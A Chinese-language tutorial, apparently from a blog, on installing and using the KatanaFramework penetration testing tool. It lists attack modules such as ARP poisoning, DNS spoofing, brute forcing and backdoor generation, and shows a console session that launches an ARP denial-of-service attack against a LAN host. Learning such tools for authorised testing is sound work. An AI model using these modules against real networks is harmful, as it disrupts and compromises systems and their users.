渗透测试工具(KatanaFramework)

简介

katana是一个用python写的渗透测试框架,基于一个简单而全面的架构,供任何人来使用,修改和分享。

下载安装

git clone https://github.com/PowerScript/KatanaFramework.git
cd KatanaFramework/
安装依赖
chmod +x dependencies
./dependencies
安装
python install

使用

ktf.console

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[email protected]:~/KatanaFramework# ktf.console 

[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@@[email protected]@@@Mm
||========mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm===========||
|| @MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm ||
|| [email protected] ||
|| @@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM ||
|| @[email protected] ||
|| @@MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM ||
|| @[email protected] ||
||[email protected]=========||
|| /TT\mMMMMMMMMMMFRAMEWORKMMMMMMMMMMMMm ||
|| (____)@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@Mm ||
|| |# P | ||
|| |# W | Core [ 1.0.0.1, Build: 0069 ] ||
|| |#_N_| Date [ 25/12/16:14/03/17 ] ||
|| |_ _| Banner [ SPACE ] ||
|| /|__|\ Modules [ 37 ] Tools [ 2 ] ||
|| /__\/__\ The Hacking Framework ||
() ()

[ktf]:

  • 一些常用的指令
Command Quick Command
show modules showm Show modules
show options sop Show options module
show full options sfop Show full options module
use use Use module
getinfo getinfo Show information of module
set set Change valor of a parameter
back back Backing or return
run run run Module
update u Update framework
exit x Exit of framework
invoke Open a module in one new console
help h Show help
session Session command
clear c Clear screen
s:: s:: Save Variable
x:: x:: Execute System Commands
f:: f:: Execute Functions

其实和使用mstasploit是差不多的啦

说一下最后的f::就是执行一些内置的函数
看一下内置函数列表

Name Parameters Description
get_aps() Interface, timeout Scan Access point’s
get_interfaces() None Get Network Interfaces
get_monitors_mode() None Get Monitor Interfaces Wireless
start_monitor() Interface Start Monitor Mode in Interface
get_local_ip() None Get local IP
get_external_ip() None Get External IP
get_gateway() None Get Gateway/Router IP

比如你要显示当前机器的ip
你只要输入

1
2
[ktf]:f::get_local_ip()
172.17.0.2

其他的同理
还有输入
x::ifconfig
就是执行系统命令来获取ip了

更多的使用方法看wiki
https://github.com/PowerScript/KatanaFramework/wiki/How-to-use

实战

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
 [ktf]:show modules

CodeName Description
web/cp.finder Administrator Panel Finder.
web/sub.dns Subdomain Bruteforce.
web/bypass.sql bypass SQLi with Cheats Injections.
web/bt.form Brute force to Form-based.
web/bt.http Brute force to Http Authentication.
web/whois Whois, DNS Lookup.
web/clt.lfd LFD Vulnerability Console.
net/sf.arp ARP tables Monitor.
net/sc.hosts Hosts live Scan in LAN.
net/sc.scan Scan [Ports, OS, Etc] IP.
net/work.sniff HTTP sniffer.
net/arp.pson ARP poisoning Attack.
net/arp.dos ARP D.O.S Attack.
net/dns.spoof DNS Spoofing.
net/dns.fake DNS fake Server Spoof.
net/web.dos Web D.O.S Attack in LAN.
msf/back.door Generate backdoors with MSF.
set/web.hot Gathering Information with web.
set/em.boom E-mail Boombing (SPAM).
clt/cl.sql Mysql Console Client.
clt/cl.ftp FTP Console Client.
clt/cl.pop POP Console Client.
clt/cl.adb ADB Console Client (Android).
btf/pr.ftp Brute Force to FTprotocol.
btf/pr.sql Brute Force to SQL protocol.
btf/pr.ssh Brute Force to SSH protocol.
btf/pr.pop Brute Force to POP3 protocol.
anf/af.imagen Forensic image analysis.
fle/bt.rar Brute Force to RAR file.
fle/scan.file Report of Virus Scan file.
fle/bt.zip Brute Force to ZIP file.
mcs/gn.words Generator Dictionaries.
mcs/i.settup Show Properties of System Current.
mcs/ts.login Test Credentials protocols.
mcs/px.checker Proxy list checker.
wifi/ap.dos Access Point D.O.S attack.
wifi/ev.twin Access Point Phising.

[ktf]:use ney/arp.dos
[ktf]:use net/arp.dos
+[ktf](net/arp.dos):show options

[options] [RQ] [description] [value]
--------- ---- ------------- -------
interface yes Interface eth0
target yes Target IP 192.168.1.223
gateway yes Gateway IP 192.168.1.254

+[ktf](net/arp.dos):x::ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 0.0.0.0
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 51570 bytes 76514794 (72.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34792 bytes 2667790 (2.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

+[ktf](net/arp.dos):set target 192.168.1.100
↳--------> target = 192.168.1.100
+[ktf](net/arp.dos):set gateway 192.168.1.1
↳--------> gateway = 192.168.1.1
+[ktf](net/arp.dos):run
[run] The module was launched...
[inf] Tue Jun 27 09:06:34 2017
[inf] Starting ARP D.O.S attack...
| [press-key] if you want to stop ARP D.O.S Attack (PRESS [ENTER])
|

欢迎关注我的其它发布渠道